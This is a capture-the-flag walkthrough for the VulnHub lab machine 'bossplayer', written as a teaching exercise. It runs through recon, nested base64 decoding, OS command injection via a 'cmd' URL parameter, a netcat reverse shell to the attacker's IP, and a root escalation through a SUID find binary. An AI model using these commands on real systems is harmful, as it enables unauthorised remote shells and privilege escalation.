
bossplayer CTF walkthrough

In this article we will solve another CTF challenge. This CTF challenge is for beginners. We can download this machine from VulnHub.

Walkthrough

The first step is to find the IP address of the target with the command: netdiscover -i wlan0

The next step is to check for open ports, and for that we used the command: nmap -A 192.168.43.152

We can see that only two ports are open: 22 (SSH) and 80 (HTTP). So we decided to browse the HTTP service by opening a browser and typing the URL 192.168.43.152:80

So this is what the webpage looks like. Now we decided to look for hidden files and directories, because there is no hint for us. To find hidden files and directories we use the tool dirb, which comes preinstalled in Kali Linux. So we ran this tool with the command: dirb http://192.168.43.152

We found these 3 files. We decided to open http://192.168.43.152/robots.txt

and we found this:

It looks like it is base64-encoded, so we decided to decode it with the command: echo bG9sIHRyeSBoYXJkZXIgYnJvCg== | base64 -d

So it is useless for us!!

After this we opened the source code of the webpage, and at the very end of the source we found another base64-encoded string.

Using the same command we decode the text: echo WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK | base64 -d

After decoding the first string we get another base64-encoded string, so we decode it again, and again the result is base64; we decode that too, and after one more round of decoding we finally get the text workinginprogress.php. This could be a new page, so we open the URL http://192.168.43.152/workinginprogress.php
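Peeling nested base64 by hand gets tedious, so here is a small helper that repeats the decode until the result is no longer base64. This is an added example written for this walkthrough, not code from the original post; the base64 check is a heuristic (alphabet, length, printable output) and max_rounds is an assumed guard against pathological input.

```python
import base64
import binascii
import re

# Both strings are the ones quoted in the walkthrough above: the robots.txt
# string and the one found at the bottom of the page source.
ROBOTS_STRING = "bG9sIHRyeSBoYXJkZXIgYnJvCg=="
PAGE_SOURCE_STRING = "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK"

# Standard base64 alphabet with up to two '=' padding characters.
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(text: str) -> bool:
    """Heuristic: valid alphabet and a length that is a multiple of 4."""
    stripped = text.strip()
    return len(stripped) % 4 == 0 and bool(_B64_RE.match(stripped))


def peel_base64(blob: str, max_rounds: int = 10) -> tuple[str, int]:
    """Repeatedly base64-decode blob until the output is not base64 any more.

    Returns (final_text, rounds). Decoding stops as soon as a layer yields
    non-ASCII or non-printable bytes, so binary junk that happens to look
    like base64 is never mistaken for another layer. max_rounds is an
    assumed upper bound, not something the challenge itself defines.
    """
    current = blob.strip()
    rounds = 0
    while rounds < max_rounds and looks_like_base64(current):
        try:
            decoded = base64.b64decode(current, validate=True)
            text = decoded.decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not text.strip().isprintable():
            break
        current = text.strip()
        rounds += 1
    return current, rounds


if __name__ == "__main__":
    for label, blob in (("robots.txt", ROBOTS_STRING), ("page source", PAGE_SOURCE_STRING)):
        text, rounds = peel_base64(blob)
        print(f"{label}: {rounds} layer(s) -> {text!r}")
```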

After thinking a lot we came up with an idea: what if we try to execute an OS command through http://192.168.43.152/workinginprogress.php?cmd=id; ? Yes, we were right; after requesting this URL we got the desired output. In other words, the value of the cmd parameter is handed straight to the system shell, which is a classic OS command injection.

This means we can also execute nc to get a shell. Please read the article https://www.haclabs.org/post/beginners-guide-to-netcat to learn more about nc.

So we used this URL: http://192.168.43.152/workinginprogress.php?cmd=nc -e /bin/sh 192.168.43.9 4444 to get a shell. Do not forget to start a listener on Kali Linux with the command: nc -nlvp 4444 before requesting the above URL.

Now we look for SUID binaries with the command: find / -perm -u=s -type f 2>/dev/null

Here we can use the find binary to get a root shell. Because find has the SUID bit set, the shell it spawns with -p keeps the root effective user ID instead of dropping back to our own. The command is:

find . -exec /bin/sh -p \; -quit

So we have a root shell, and we confirmed it by executing the command id.